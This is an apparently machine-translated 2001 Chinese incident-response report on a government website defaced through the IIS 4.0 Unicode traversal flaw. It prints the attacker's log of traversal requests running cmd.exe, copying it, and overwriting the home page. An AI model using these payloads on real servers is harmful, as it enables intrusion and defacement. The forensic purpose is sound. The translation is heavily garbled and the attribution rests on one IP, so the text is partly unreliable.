How do American hackers attacked China?

zhaozj2021-02-08  219

Author: Zhu Xiaoying

I am a security engineer of the company. Recently, the American hackers launched an attack on my country's government websites, which was fierce, and our company's security emergency response center has received 7 or 8 such cases.

According to our invasion process of these cases, it is found that American hackers did not adopt a very high-minded means, and most of them were the weakness of the wealth, and they were looking for a small website to attack, which used several harmful Safety vulnerabilities, one of the following examples are common on many websites in my country. I hope that your network will appreciate the invasive cases like this through the Internet media, causing everyone's alert and take practical measures to protect. I hope that the Internet media is not only hot in the report of the attack, but also put some focuses on security protection, so that there is both news value and help readers. Thank you!

Invasation analysis of www.xxxx.xxx.cn

One: Event background

The website of Guangdong C-office is www.xxx.com.cn (IP: 61.xxx.xxx.17) is a hacker malicious attack during April 2001, resulting in a website web page to be modified. In this case, Shenzhen An Lu Technology Co., Ltd. was commissioned by a city S-Board on April 17, 2001, and went to the computer room on-site forensics.

2: The basic situation of the server and the information that has been obtained, the server operating system is Windows NT Server 4.0, which is installed with IIS 4.0, and uses firewall mask, only open Web services. Our technicians are collecting MS IIS 4.0 from April 13 to April 17, Apr 2, HTTPLOG and FTPLOG.

Three: Analysis

Since the station is modified for the web page after being invasive. And the station is subject to PIX Firewall defense, only open 80 ports, so preliminary estimation is to obtain system control through IIS remote vulnerability, IIS 4.0 default ISM.DLL , Msadcs.dll, Unicode, etc. Remote Vulnerabilities for web modification permissions. So the technical staff of our company conducted detailed analysis and filtration of the server's MS IIS 4.0 from August 17 to April 17, 2001, to draw the following conclusions:

Intruders use the Unicode vulnerability, so that you can use the Web port to submit a request to execute the command, modify the website home page.

Note: For details, please see: http://www.cnns.net/article/db/822.htm

The changed page is as follows:

The following is an intruder's intrusion record:

1: intruder IP 2: Date 3: Time 4: Usage 5: Access URL

6 server return number

If the server returns 200, the intruder successfully implemented the command using the Unicode vulnerability.

1 2 3 4 56

152.158.208.65 01-4-17 4:34:19 get / scripts / .. 鼆 €€€€?. / Winnt / System32 / cmd.exe, / C Dir C: 500

152.158.208.65 01-4-17 4:34:19 get /scripts/..?../winnt/system32/cmd.exe, / c DIR C: 500

152.158.208.65 01-4-17 4:34:19 get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:19 get /_vti_bin/../../..../..../../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:19 get /scripts/.../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:21 get /scripts/.../winnt/system32/cmd.exe, / c dir c: 200152.158.208.65 01-4-17 4:34:21 Get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:21 get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:21 get /_vti_bin/../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:23 get /scripts/.../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:23 get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200

152.158.208.65 01-4-17 4:34:23 get / scripts / .. 饊 € ?/ Winnt / System32 / cmd.exe, / C DIR C: 500

152.158.208.65 01-4-17 4:34:23 get / msadc/../../..../../../winnt/system32/cmd.exe, / c dir C: 200

152.158.208.65 01-4-17 4:34:25 get /scripts/..o../winnt/system32/cmd.exe, / c DIR C: 404

152.158.208.65 01-4-17 4:34:25 get /scripts/..?../..........MSSQL7/INSTALL/PubText.bat" & dir c: 403

152.158.208.65 01-4-17 4:34:25 get / scripts / .. 鴢 €€? ./ Winnt / System32 / cmd.exe, / C DIR C: 500

152.158.208.65 01-4-17 4:34:25 get / 鄝 ?/ Winnt / System32 / cmd.exe, / C DIR C: 404

152.158.208.65 01-4-17 5:21:17 get /scripts/.../winnt/system32/cmd.exe, / c set 502

152.158.208.65 01-4-17 5:21:37 get /scripts/.../winnt/system32/cmd.exe,

/c copy c:winntsystem32cmd.exe c:inetpubscripts1.exe 502

152.158.208.65 01-4-17 5:24:32 get /scripts/..../inetpub/scripts/1.exe, / c DIR C: 200

152.158.208.65 01-4-17 5:24:38 get /scripts/..../inetpub/scripts/1.exe, / c set 502

152.158.208.65 01-4-17 5:24:49 get /scripts/..../inetpub/scripts/1.exe,

/ C DIR C: INETPubwwwrootfastinfo 200

152.158.208.65 01-4-17 5:25:10 get /scripts/.../inetpub/scripts/1.exe ,/c echo rtyc:NetpubwwwrootfastinfoIndex.asp 502

152.158.208.65 01-4-17 5:25:19 Get /index.asp 200

152.158.208.65 01-4-17 5:25:37 get /scripts/..../inetpub/scripts/1.exe, 502

/c echo ^^join us: poizonb0x@linuxmail.org ^^^^^^^^^^^^^^^^^^ ^^ ^^^ Pix, ^^^> C: inetpubwwwrootfastinf

OINDEX.ASP 502

152.158.208.65 01-4-17 5:25:43 Get /index.asp 200

From the above analysis, we can clearly see the intruder from the same IP on April 17, 2001, trying to use the Unicode vulnerability remote execution command to achieve the purpose of modifying the web page.

The attack time is: April 17, 2001 4: 34: 19 - April 17, 2001 5:25:43

The intruder IP address is: 152.158.208.65 from the United States

Four: Conclusion

Intruders use the Unicode remote vulnerability to get system control, multiple remote execution commands, after understanding the server structure, modify the home page.

Lock IP is: 152.158.208.65 from the United States

The attack time is: April 17, 2001 4: 34: 19 - April 17, 2001 5:25:43

The intruder physical address is the United States

转载请注明原文地址:https://www.9cbs.com/read-2098.html

New Post(0)